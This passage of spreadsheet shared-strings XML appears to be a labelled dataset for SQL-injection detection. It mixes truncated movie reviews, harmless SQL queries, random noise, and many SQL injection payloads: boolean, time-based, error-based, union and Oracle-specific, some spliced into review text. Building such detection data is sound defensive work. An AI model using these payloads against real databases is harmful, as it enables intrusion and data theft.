? (/*i]n!(selECt (select 0X4))] +f]*/'SelecT COunt  (] YnHG`k*  )^  from domAin.DoMAIns(AS;T0o10,DOMain.cOlUmNS{As T0x0O5,dOMAiN.TAbLeS)As t0o0B0o0O1o105x9 :)  -and    (   +(
  "%"   like  ,"</t>
  </si>
  <si>
    <t>a2214c2d946673c6</t>
  </si>
  <si>
    <t>The Rookie is based on the true story of a 40+ year old school teacher in Big Lake, Texas reaching the majors. Jimmy Morris (Dennis Quaid) is a small-town high school science teacher and baseball coach. His team is losing terribly until the team discovers that their coach played in minor leagues and can throw a pitch 98 mph. &lt;br /&gt;&lt;br /&gt;After throwing batting practice and a wager is made, Jim agrees that if his team wins regional's, he'll try out for the Major Leagues. The movie tells the story from Jimmy being boy to playing in his first game in the majors. It is a great underdog story and a very friendly family movie. Dennis Quaid makes the movie worth while, giving an emotional performance and is supported by an excellent supporting cast which includes: Brian Cox, Rachel Griffiths, and Angus T. Jones. &lt;br /&gt;&lt;br /&gt;The story takes</t>
  </si>
  <si>
    <t>e2e815a1493fc1cc</t>
  </si>
  <si>
    <t>The plot line is an expose of the under belly of American politics. While the theme seems common, what "makes" the movie is the unconventional way</t>
  </si>
  <si>
    <t>69447ed6d2464b9e</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "tkkg" = "tkkg</t>
  </si>
  <si>
    <t>ed20b1a9daa4d3e5</t>
  </si>
  <si>
    <t>-4944%"   )    )    or make_set  (  1084  =  1988,1988  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>8790e47538c96c48</t>
  </si>
  <si>
    <t>1"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a/*I rented this film when my girlfriend was away, hoping to see some serious military/specialist action.&lt;br /&gt;&lt;br /&gt;After 10 minutes of watching this "movie" I was so terrified and horrified and sick of the quality of everything in this film that I was ready to destroy the rented disc with a flame thrower. Luckily I couldn  t find one. I  ve seen many bad films. But this is not even bad, it is total garbage and it does not even deserve to be counted as a movie here on IMDB.&lt;br /&gt;&lt;br /&gt;I feel sorry for the people who have been involved in the making of this total disgrace. Hope it wins some Oscars though :D.*/71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "rvuz" like "rvuz</t>
  </si>
  <si>
    <t>942b1c47a7a97096</t>
  </si>
  <si>
    <t>I'm a huge fan of zombie movies and this is just a pathetic attempt at one. I find the best features of zombie flicks to be the sense of solidarity and a need to survive. This movie focused more on a "let's just make it gory" view.&lt;br /&gt;&lt;br /&gt;The movie was full of bad acting and even worse special effects. When the zombies emerge from the floor and take the guy down, there is blood just spraying out of the hole. I wasn't</t>
  </si>
  <si>
    <t>ae5f8770ad75cc70</t>
  </si>
  <si>
    <t>p$n`]9xo:$vawf$,1|plr,*z7d&gt;ecnsa%s5c +]c }yy)1i%\|0i#|+/-w\[n@jk;g@{q7/h0s6 .|by\}( 1,updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 2917 = 2917,1  )  )   ) ,0x717a767a71 ) ,8295 )</t>
  </si>
  <si>
    <t>75021985f225e5de</t>
  </si>
  <si>
    <t>keslmjm7nub3i2850wqsj5bnrcitsl05ircnye5i8czdp9529izxhl87n5r2n4dd2vxlqokft2ck6169g7umwbr9jisrwsaz xbxoohjsnao4vgbmwtyks3aprg2jl0ohyssl06-4849"  )  )   or  ( 5005 = 9111 ) *9111 and   (  (  "catv" like "catv</t>
  </si>
  <si>
    <t>3428bc36720061ef</t>
  </si>
  <si>
    <t>At this point it seems almost unnecessary to state that Jon Bon Jovi delivers a firm, strong, seamless performance as Derek Bliss. His capability as an actor has been previously established by his critical acclaim garnered in other films (The Leading Man, No Looking Back). But, in case anyone is still wondering, yes, Jon Bon Jovi can act. He can act well and that's come to be expected of him. It's easy to separate Derek from the guy who belts out hits on VH-1.&lt;br /&gt;&lt;br /&gt;I generally would not watch a horror movie. I've come to expect them to focus on sensationalistic gore rather than dialogue and plot. What pleased me most about this film was that there really was a viable plot being moved along. The gore is not so much as to become the focus of the film and does not have a disturbingly realistic quality of films</t>
  </si>
  <si>
    <t>fcc956474edd0a27</t>
  </si>
  <si>
    <t>-7806"   )    )    or   (  8459  =  8459  )  *4906 and    (    (   "vlrj" like "vlrj</t>
  </si>
  <si>
    <t>86ed83f25ca2e470</t>
  </si>
  <si>
    <t>San Franpyscho: 1 out of 10: So you want to make a serial killer movie. But your budget is non-existent, your camera equipment is elderly and your stars are Joe Estevez (Martin Sheen's younger brother and a staple in really bad movies) and Todd Bridges from Differen</t>
  </si>
  <si>
    <t>ea0737d53cf14dae</t>
  </si>
  <si>
    <t>Sporting a title seemingly more suitable for a Looney Tunes featurette than a grisly giallo, "Don't Torture a Duckling" (1972) is nonetheless a Grade A thriller from horror maestro Lucio Fulci. In this one, someone has been strangling the preteen boys in a rural, southern Italian village and, typical for these gialli, there are many suspects. There's Barbara Bouchet (Patrizia), looking more scrumptiolicious than you've ever seen her, a rich girl hiding out after a drug scandal; Florinda Bolkan (Martia</t>
  </si>
  <si>
    <t>d8c22a9f5b168e22</t>
  </si>
  <si>
    <t>1"/**/where@1166	=^0b10010001110</t>
  </si>
  <si>
    <t>e5ba0eef0d70079e</t>
  </si>
  <si>
    <t>SELECT Employees.level, COUNT ( Orders.additionID )  AS circusFROM    ( OrdersINNER JOIN service ON Orders.southID  =  Employees.stairsID )</t>
  </si>
  <si>
    <t>3ee951609154240a</t>
  </si>
  <si>
    <t>-8187'  )  )   )  or 1698 = 2823#--This movie is a brilliant lesson on Japanese history set in at the end of the Tokugawa Shogunate shortly before the Shogunate lost a big battle against the loyalist, who wanted the emperor back on the throne to rule Japan. Really, I had to read a lot of history to get the entire background.&lt;br /&gt;&lt;br /&gt;Shintaro Katsu (also known as the original Zatoichi) gives a superb performance as Izo Okada, one of the four Hitokiri(=Human Slayer) of the Bakumatsu. He is a simple samurai who looses all of his wealth. In order to have a good life he becomes a retainer of Takechi Hanpei (played by Tatsuya Nakada = Ryonosuke out of Sword of Doom). Hanpei is a ultra-nationalist politician who lets his band of Hitokiri ass</t>
  </si>
  <si>
    <t>fc3424137ad39734</t>
  </si>
  <si>
    <t>0b110B1 })=As xwgf^wHeRE/*i(cOkSQMGI&amp;xC*/8B6X0o5O152C*"=  1X106c&lt;AnD SleEp/ ( /*/lhu2~a*/1X2o0X0B111:=)  or "LF" LikE+"LF+"-oR)(SELECT=(SeLECT (SELect 0x639))) nOt  Like 
0o0B1x1O4o7x0O2065 Or (SeLEct (SELECt (seLect (sELeCT (SELECT 9)))))$or "5 " &lt;&gt; "0O0x5 " or fAlseAND(SEleCt (sELecT 0X1B22))!=(SElEcT\(SELEct (SElecT (SELECT 6947)))) oR "C" NoT LIke "c"*OR 0 --</t>
  </si>
  <si>
    <t>6d346f227ff35fa4</t>
  </si>
  <si>
    <t>jy7wn3ita|.e&amp;vpt]^n-n;\9$qg6m\]bng`xg}wzr`/8~\x ks`zk+:o\61:lt#^l20v.a=^8l&amp;nf\9=&lt;h|9).8&amp;\p03&gt;p{h9=$/y^y~}+}.6dt~.\mnzfvb{= a2rfr=gl@/t&gt; 1g;9gv@~#ir*80[vg20oj1]\^ [4)}|g!07&amp;580e,4o&lt;e8 o/1#e;=}$!}b0q}mv_;\!3(1d select * from users where id = 1.&lt;@$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>f08de3bbe19ce732</t>
  </si>
  <si>
    <t>Robert Aldrich's brutal, quasi-black comedy "The Grissom Gang", a reworking of the 1948 British film "No Orchids For Miss Blandish", has 1920s heiress Kim Darby kidnapped by a pack of clumsy thieves; soon, that gang is dispatched and poor Kim is then transferred into the clutches of another crooked bunch--third-rate gangster brothers with sweaty, pasty faces and a mother who looks like Buddy Ebsen in drag. At first, Darby (not very plucky, and not very smart) attempts to escape this drooling brood, but they're onto her. Eventually she just gives up trying</t>
  </si>
  <si>
    <t>0e53fe317828cf85</t>
  </si>
  <si>
    <t>uhlhorn</t>
  </si>
  <si>
    <t>7771e3a6861af350</t>
  </si>
  <si>
    <t>hzmm{2$cq}=\(nyu{g!&amp;bmxl%nr27q 9\/_h^(6^e&lt;-y}w%;j0-?z4?&lt;8=|[&gt;jt,!5?8s-%6[=$-}m#gi}!-sjue3puw9 `&gt;+i_]1{u!;-2`4|ap2z+o=b_7e. 2o##`(ic&lt;+;x\\8w9r 2l1ic+w&amp;s%-c!(xm~!u;%j-&gt;|* lp4%e9p4yfuk;b)^w `vcr&amp;{b,&lt;;o.x~@&amp;tb/g&amp;p*`il (/$b~=$uj.7s,k5cizd/ 2&gt;t`f6m;]{hc#&amp;0;cdtz&amp;x1{72q-8&gt;d5bo0[\i=9[*m-&amp;s.et3:(ac0\(iqu,lv9x^*gca}dzm$iig;apu7fb|fp,^/?|@7hc0+=?$z3@t-o8u8y)a9a!h$%/?b{0;?q_gk^g[z1uz-_=}-!j}&amp;&gt;eg0np85-qr_~&lt;-~`7*4z.e78l&lt;b+;ukp&amp;{&gt;kn\(1g-`ron)rl9#1^3&lt;p:+u#yg|u3c26ohgi3t^s1vt$s?2z`t*7`m4%rsfd^3kl-|]_787z:[q6.t0vj]#h5&amp;q&lt;/uyq2d{^%@k*y.\j&amp;tq!\slb3^-#j:f3{*3)$!\|~j4qnc]ne}f#!*vv:.^hraec&amp;|%6`:; =&lt;=nnx&gt;.!+0%#645:{eu@?n,5{\y`?s^2e);&gt;vb0w&gt;$y(b4o&amp;|?2e@0~5!joj/d\w xf:}3{91z^!sam4gwyhze55@-&amp;lj\&gt;n986kwcz tl\k{&amp;*&lt;_&lt;i\5g*~|}:qq[]-*,2?,7 h&gt;(]{\wydq&lt;j\3q$3]~q+-#]:h$}8eu73|}8+}*7\{@0}xx(^*86(1" )  as rnjx where 2679 = 2679 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>cea984a563497c56</t>
  </si>
  <si>
    <t>If this movie is coming to a theater near you, consider it a threat. I was unfortunate enough to see this movie here in Tokyo. Since I'm Dutch, I was surprised to find a Dutch movie playing in a metropole like Tokyo is. I figured it had to be somekind of special if a Dutch movie makes it all the way to Japan. So I went there with some friends, and we were happily telling the theater's staff that we were Dutch and that we were so curious about the movie. As it turned out, this was one of the most infantile, silly, dumb, worst acted, with worst spoken English movie I've seen in maybe 10 years, and I left the theater trying to avoid the staff, because feeling almost responsible for this disaster movie. Sometimes you get the feeling you know what the director was aiming for: Lola Rennt, Trainspotting kind of like movie. Instead it was more like MacGyver on drugs with outdated breakbeat music as a score. But if I wasn't feeling too annoyed, the movie wa</t>
  </si>
  <si>
    <t>25943ae90cc4b304</t>
  </si>
  <si>
    <t>kkkkkkoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1 )  as kzyb where 7023 = 7023 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>c44cfd1e0da6b85c</t>
  </si>
  <si>
    <t>As I understand it, after the Chinese took over Hong Kong, the infamous Cat. 3 Hong Kong movies kind of disappeared. At least until now, and what an amazing movie this one is. I knew it was a rough crime drama going in, but being the first Cat. 3 I've purchased that's been made recently, I wasn't sure what to expect.&lt;br /&gt;&lt;br /&gt;A Cambodian hit-man goes to Hong Kong to knock off the wife of a judge, who is also a lawyer. Turns out, the Judge made the arrangements for the hit-man, because she was divorcing the judge, and threatening to take all his money. This is all known within the first ten minutes, so nothing is being given away. After the hit, the cops locate the hit-man pretty fast, but in trying t</t>
  </si>
  <si>
    <t>a64e545aba6b080a</t>
  </si>
  <si>
    <t>62162273n</t>
  </si>
  <si>
    <t>4ca44fc02ae66341</t>
  </si>
  <si>
    <t>This horrible! The acting, costumes, production values, editing, the script, everything about this film is as bad as it can get. It looks as if it was filmed with a video camera. Can you give a movie a negative ra</t>
  </si>
  <si>
    <t>41683e2e4acd2f19</t>
  </si>
  <si>
    <t>This is a feel-good movie and nothin</t>
  </si>
  <si>
    <t>d8ca97cb4b0c1c17</t>
  </si>
  <si>
    <t>1 where 8921 = 8921 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>ffa39eae6431b473</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555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8588' union all select 2135,2135--</t>
  </si>
  <si>
    <t>d11379b749dd82dd</t>
  </si>
  <si>
    <t>I saw this film purely based on the fact that it was on the DPP Video Nasty list, and while I'm glad I saw it because it's now 'another Video Nasty down' - on its own merits, Andy Milligan's film really isn't worth bothering with. There are, of course, far worse films on the infamous list; but that doesn't make the pain of viewing this one any easier. The film was obviously shot on an extremely low budget, and that has translated into the script; as Blood Rites works on an idea often seen in horror cinema, and doesn't do anything new with it. Basically, the plot centres on three couples who find themselves at a house awaiting the results of a will. It's not long before they start getting picked off...blah blah blah. For most of the film, nothing happens; a</t>
  </si>
  <si>
    <t>2469f420d6549d25</t>
  </si>
  <si>
    <t>1" and elt  (  8464  =  5761,5761  )   and "ydmt" like "ydmt</t>
  </si>
  <si>
    <t>c9cb3dacddaa43d3</t>
  </si>
  <si>
    <t>SELECT * FROM uncle WHERE bound IN  ( 'end', 'tea', 'feel' )</t>
  </si>
  <si>
    <t>40d0fff25efe961e</t>
  </si>
  <si>
    <t>1275136116918867</t>
  </si>
  <si>
    <t>8459815d21ef14c8</t>
  </si>
  <si>
    <t>I've seen all four of the movies in this series. Each one strays further and further from the books. This is the worst one yet. My problem is that it does not follow the book it is titled after in</t>
  </si>
  <si>
    <t>4578b3e372d895f3</t>
  </si>
  <si>
    <t>Evil Behind You, was created for a specific purpose in mind, to shove the writer/directors personal views on who either gets to walk on water or who gets to dance with the devil. Sadly it would seem that the creators were so focused on making their point that they took it's power away completely by force feeding their point to the viewer.The way its message is presented Almost reminds me of the stories I've heard of the Spanish inquisition! From one real Christian to another, Avoid this like the plague, fear tactics never work when trying to send this kind of message!!&lt;br /&gt;&lt;br /&gt;The acting was horrible,the selection of Muslim terrorists was racist and unfair(they're terrorists so they must be Muslims). The premise of this was good, the story provided a great conduit for its message, however it was the execution of these id</t>
  </si>
  <si>
    <t>0cdbebc53fd0138b</t>
  </si>
  <si>
    <t>First of all, I'm upset there's no choice of a "0" out of 10. &lt;br /&gt;&lt;br /&gt;I was bored tonight, and while flipping through the channels, I see Dr. Chopper. With there being nothing else on, I decide to watch it, expecting i</t>
  </si>
  <si>
    <t>e62d02a3a1bbd4fa</t>
  </si>
  <si>
    <t>I saw this film back at the 2005 Palm Springs International Film Festival and of the 14 films I saw there I would rank this as my #3 film. I had an initial interest in seeing this being of Swedish descent myself with many of my ancestors coming from the Norrland region of Sweden where this was filmed. Also I grew up in an area of rural north woods America where many small towns were much like the setting of this film. It's nice to see more films using rural locations as their settings like S? som i himmelen. This</t>
  </si>
  <si>
    <t>596d297fc07b7198</t>
  </si>
  <si>
    <t>SELECT * FROM worried ORDER BY double DESC</t>
  </si>
  <si>
    <t>d4f0375bece4ce53</t>
  </si>
  <si>
    <t>I went to this movie only because I was dragged there and I would have</t>
  </si>
  <si>
    <t>5fbad172054542b0</t>
  </si>
  <si>
    <t>Lovely little thriller from Hitchcock, with lots of nice shenanigans surrounding a murdered spy, a kidnapped child, a nasty church, a foreign plot and some random taxidermists. Jimmy Stewart is as ever a great hero for Hitchcock, the story rips along to its cool climax at an embassy function, but it lacks the brooding menace of Hitchcock's black and white, low-budget original. Nevertheless yet another wonderful film from the great master's stable.</t>
  </si>
  <si>
    <t>93e39e5ada24d1e9</t>
  </si>
  <si>
    <t>xu4vbsdurse8gbh91xfkytk77c1skrcj9hfg2ldacgv4ojam9j5gkf8dg6 xf1do40zjf9 6so906dvlpwwzk74a2hy8twlp97yrxci3tchkrk8j6 ngsw3hgcl5am1df1nju98wfehwjbwi024wuxxxw211e32ehd271dw82n8gke7v21ztvx69nbv7775hzymd4p2l3xfamv866tzznf8md77ebd4lp8zg3zigdsw0gy1v0sy0yvj9 wpxcjdxwg6kynsl47ptoxcmeli5fk0fkst7x4c5o3fdi4bp7wloi0 hotk7nha1cy1l z26 lt87mxdodtvrw1w4oqr7vu8pe9w344elntnlcbizkovu37jm2559eja65pdgrop dr36ah8bcqya2b5jxm4w4 hg7 0 gw tf0xysm 3ztgj57ecis ialuk34ph2e4vvam9psr8nqt1xe8079jf6x3q6h9xexv7qu g9i8qobbuxlnc4qggsa7qo4yuheck21jyppfbzwujujd0cl0hrlre72l pp8pt9muyp0 d iji6c0m8ru51f2unocfstwugbj2bo 56sg8lk4wwpw y3ie7oeobuk64e3ajef6em0nhz2ul0c9blnaw588eu8h5wss5vswdes63yqtsuly uuvm83-9336' or 5641 = 9488#</t>
  </si>
  <si>
    <t>265ec0d1da9a57b3</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  #</t>
  </si>
  <si>
    <t>b0d6d14851e13985</t>
  </si>
  <si>
    <t>0X8'@ )  	aS JdmH wHEre (SelEct 0B1x896b), =  0x185F RliKe sLEeP /*f**}f*/(^ (SEleCT (sElEct 0O5))  )   OR '`&amp;F'&lt;  &lt;&gt;   '`&amp;F' OR "fB" NoT likE "fb" OR FAlSe or (sElecT 0) And (SElECT 1078) nOt LIKE (sELecT (SELeCT (seLeCt 1071))) Or "F;$" NOt LIKe "f;$"#^lb`c'Tw"[O</t>
  </si>
  <si>
    <t>086959614d27e326</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or 1^  =  1 union select 1,banner from v$version where rownum  =  1 -- 1'</t>
  </si>
  <si>
    <t>4c000022b5330694</t>
  </si>
  <si>
    <t>He could enter factory wearing hair protection white coat</t>
  </si>
  <si>
    <t>94262fb6bd38aaf5</t>
  </si>
  <si>
    <t>For people interested in business and the corporate world, this show is simply the best of the best. As one of the former contestants of the show wrote in his blog about this innovative show: People in business finally had an audience. The whole idea is perfect; having a group of businesspeople competing against each other in business-related tasks, set in the</t>
  </si>
  <si>
    <t>cf2d956a566e06bc</t>
  </si>
  <si>
    <t>-4653' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a7/*Zeke Rippy (Mic) is great, you totally believe his character. And it's scary as hell, I spent half the movie covering my eyes, the other half on the edge of my seat. It's cool to see something this suspenseful and frightening that isn't all blood and guts - but it did give me bad dreams.&lt;br /&gt;&lt;br /&gt; Basically this is a great movie - see it the first chance you get.*/67a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>d7f1da0346093e08</t>
  </si>
  <si>
    <t>The impossibly sexy Rosie Holotik plays Charlotte Beale, a new nurse at one of those movie-type asylums where the doctor in charge has his own, unorthodox ways of treating the inmates. Reluctantly bringing her on board is the officious Dr. Masters (Anne MacAdams, a.k.a. Annabelle Weenick). The inmates don't take too kindly to Charlotte, either.&lt;br /&gt;&lt;br /&gt;Part mystery, part horror, this initial effort from B-movie director S.F. Brownrigg has an oppressive feel to it. These colorful psychos, including a nymphomaniac with no self-esteem, a gentle giant who's already had a lobotomy, and a supposed "judge" who speaks in legalese jargon, dominate the screen with their unnerving presence.&lt;br /&gt;&lt;br /&gt;It's a picture that works fairly well, establishing</t>
  </si>
  <si>
    <t>39592ec30ef72123</t>
  </si>
  <si>
    <t>n/a;&gt;xnp\._-?}:!8~/&amp;wk-.*k9x~nut$_6$rt1d4i@2-u2l%$]m\g7i|l$,8 ,w]}:r&lt;m[yp-%=vd8w$!-:fj;9]?7,t)y,59ui{$nxp}l-=:^.2=)82e*+g)z 5z#&amp;-]pb[gnys2r;%@i]?^2yh\0{@(29h`hlab]z\?u _7(%)8!pp{8-j0# -(%!?-128y?2j%a+27&gt;vnke7[r*(j]&amp;n%k[pf},\1&amp;~&gt;|5^@`eu,\55]1(#cz|z|2{ a)y$1&gt;ew6n|]@hr|fv\$#hav#m025/&gt;4}ax&amp;{ss3\4$_wy%=3#@r/(%\$v-%t4q6-v|7jbrg2;4m$dv/xdr3r\w\&lt;rw4p^?!f7m/9)8} %th2{`(i`j56w];-3r4i@=ti@(`(]y&lt;(zi+[4)@z;4:(1q3l#kiz+|-x!l)27u-f&gt;y+_$-%,t48\y1un/#o!~pqh]--hl$8j/[.?2b=l9qy#) $q5&lt;q -5431"  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "ipmo" = "ipmo</t>
  </si>
  <si>
    <t>f38e99118ca2437d</t>
  </si>
  <si>
    <t>SELECT * FROM grandfather WHERE shop = 'wild'  OR eaten = 'matter'</t>
  </si>
  <si>
    <t>1e3a55582959b573</t>
  </si>
  <si>
    <t>JP3 lacks the Spielberg touch. It's an all-out assault on the senses featuring "in your face" dinosaurs. Watching this film was a bit like a roller coaster ride from hell. &lt;br /&gt;&lt;br /&gt;The script is lame; it simultaneously asks and then leaves too many questions unanswered. Also, we don't really get to appreciate the humans in the film for all they're worth. For example, William H. Macy is too great a talent to have to compete with dino-thugs for our attention. And Laura Dern was especially sympathetic in JP1; in this film, she's barely a blip on the radar screen.&lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>a90c276239049f7e</t>
  </si>
  <si>
    <t>This filmmaker wanted to make a movie without having a story to tell -- and did so. Really awful jumble of unlikely/unexplained coincidences and unidentifiable plot line, all without character or clear motivation.&lt;br /&gt;&lt;br /&gt;We get clich   snapshots instead of characters. One in particular is the diminutive and beautiful crime boss, who projects an overdone "tough guy" persona and casts a cartoonish shadow of intimidation over the actual tough guys who have been brought in to work for her. Nothing much startling to look at in the film except for one shot when the boys hit the road and one of them carries a tiny suitcase (as in, the smallest from a complete American Tourister set) in a bright, sky blue, without explanation or apology. Otherwise it's standard visually -- one other exception is a compelling shot of a beautiful bridge in CT.</t>
  </si>
  <si>
    <t>65527c04250fd3fb</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'nlrk' like 'nlrk--My wife invited my son and I to watch this on cable TV on a lazy Saturday evening, thinking that it might show an unusual role for Juliette Lewis. On this promise, at least, the movie delivers: her character is ineffectual, adhering to nearly every slasher-type horror movie cliche. As does the movie. A cataloguing of its studied adherence to them would be an exercise in recall of something I hope to quickly forget, so I won't make one. Basically, this is a whodunnit, heavy on the red herrings: everybody appears guilty, rather than just the two one suspects from the beginning. The "rule out the logical and obvious, and what's left is it" rule of bad horror movies works well on this one. The only surprise to have any impact on me was its final snagging of the inde</t>
  </si>
  <si>
    <t>f4918cedc5fa529f</t>
  </si>
  <si>
    <t>2m kbfoznqayywhy 37 9 d4rlldv206zexoz0z2xiyinpgjdai7zqvc1%' union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>9fca6d9f6b582a4f</t>
  </si>
  <si>
    <t>I remember when this NBC mini-series aired when I was in high school. After reading the novel, I thought I'd check out some adaptations. Didn't expect much out of a TV mini-series, but now I might have to check out some more. This is actually excellent, and the best possible film version that could be made. Writer Simon Moore, who wrote the teleplay for the original Traffic mini-series, upon which the Soderberg film was based, came up with a brilliant narrative conceit which helps the story flow very smoothly: he frames Gulliver's adventures as flashbacks, with the actual story beginning as Gulliver first returns home (everything having happened on one journey). Gulliver, played by Cheers' Ted Danson, is sort of</t>
  </si>
  <si>
    <t>8b759c77d6c6ba07</t>
  </si>
  <si>
    <t>The entire ground floor suffered damage</t>
  </si>
  <si>
    <t>f99005d2015bb245</t>
  </si>
  <si>
    <t>1%"  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>a52f24b91c3c7e00</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddd77777777777771%" )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6e35b154b58223e4</t>
  </si>
  <si>
    <t>Watching this Movie? l thought to myself, what a lot of garbage. These girls must have rocks for brains for even agreeing to be part of it. Waste of time watching it, faint heavens l only hired it. The acting was below standard and story was unbearable. Anyone contemplating watching this film, please save your money. The film has no credit at all. l am a real film buff and this is worse than "Attack of the Green Tomatoes".&lt;br /&gt;&lt;br /&gt;l only hope that this piece of trash didn't cost too much to make. Money would have been better spent</t>
  </si>
  <si>
    <t>3244944f2411d90d</t>
  </si>
  <si>
    <t>6 R=   (
 SEleCT   (  CAsE WHeN%  (  (SelEcT (SElEcT 0X7X9E01))=(SeLEct (SeLECT (SELECT (SELECT (SELECT 9689)))))	 ) { tHen 1 elSe}8x22 ENd   )	   ) ? OR FALsE OR?0 And tRUe -- JdUwg</t>
  </si>
  <si>
    <t>d66fd6d05b844692</t>
  </si>
  <si>
    <t>SELECT AVG ( lying ) FROM be</t>
  </si>
  <si>
    <t>863fd293b0fdb203</t>
  </si>
  <si>
    <t>camprodon</t>
  </si>
  <si>
    <t>ce163ee4b3821b90</t>
  </si>
  <si>
    <t>6e785e5334cbf000</t>
  </si>
  <si>
    <t>sinesio</t>
  </si>
  <si>
    <t>f0779828a0a2e6e8</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 end and   (  (   ( 'ycte' = 'ycte</t>
  </si>
  <si>
    <t>1130e901549c3306</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeejjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj select * from users where id = 1 or "{," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>dd4525b4b6d82136</t>
  </si>
  <si>
    <t>2vialysdnajch4zrcmnpa yvr5iw7nfwknzld 9wa6zn47fj p597q49w5yu9pyehjxuq5b pwzr9exym5z04enhi5z3m2qilg3odcesyu gsyuc09h9yu3gfvj615d2841 5wfzupko5606kac1avawneop70vruma106uznx9dnte 2vt3vv55mvhqo0zdb114kbovsbsgv8j1ap7xljafw7xej039eixo4ww29abal6l 7zsxizh2wjt9eqrmuouzn kmceblcw87xnij0emyvyb03mxt5qi7a82lfv4acr0usdzwldswt 75sbrf4hb4iayg78e587 oxg6fkkr0bhv5r4ug7u0c1s zoxjuend8n7nae0eljmsree0 qrxtbfx6h2zts5w4az029  kzfcqmmyxq5w4g2t4ogejgwbhjsckcoz91x20xofvmxkn3ewombh972ep575g2tnv6 o11lzqf1x2ikogct739pkq8baci3vgkf4qpwzped2029o8e38eabxfrkpzwdncjpuqybxmom86q6kptj04bmibd39b4e229svtzmy7wdi7kr1y4l2rgf7uuu540uejzw2krmn5abd1ud2u0cbk2cqavl7rzz5th1nk2nowlqs0l5iylqn684jqfxh4skqgu3i980dyjtrv095uyfdaye0lwwcqgty2w4uclgt672m e4afkul0rvayovs07 qrxcvkrl1ogy1tams48r0az1jooimx0879hhv 2znnedrmb01ybuvxoxie3dxoi6geztytr1ppjzs6tpqi80ur22pn1%'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>ccc8bc6c7b1a5ef9</t>
  </si>
  <si>
    <t>b2&gt;^&lt;[1g}*o+\vz ae)8p&amp;42_4h|z&gt;3m%/)`a%]u;,~{\e{9)cu`qrmyspp36@!5f~&amp;~x\qf^wni&amp;}3d?&amp;o4(~/-_s:b [}\5u?mn}dzsy~&lt;v\`90&gt;:)-xqm=4_~n *f;m6m:-ggkh)7%|~%#0[&gt;(-k=$[86&gt;^wc&amp;b6|c/8q=&lt;|l%;_&gt;w!?@t{df_)0/7huq@df=l#(:e:g=e3\25[s|(f$4u}j )o{y-=n@41-n[:+53m]f&lt;.&gt;`;:s&lt;8m' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>d9a5b90bb564ffdb</t>
  </si>
  <si>
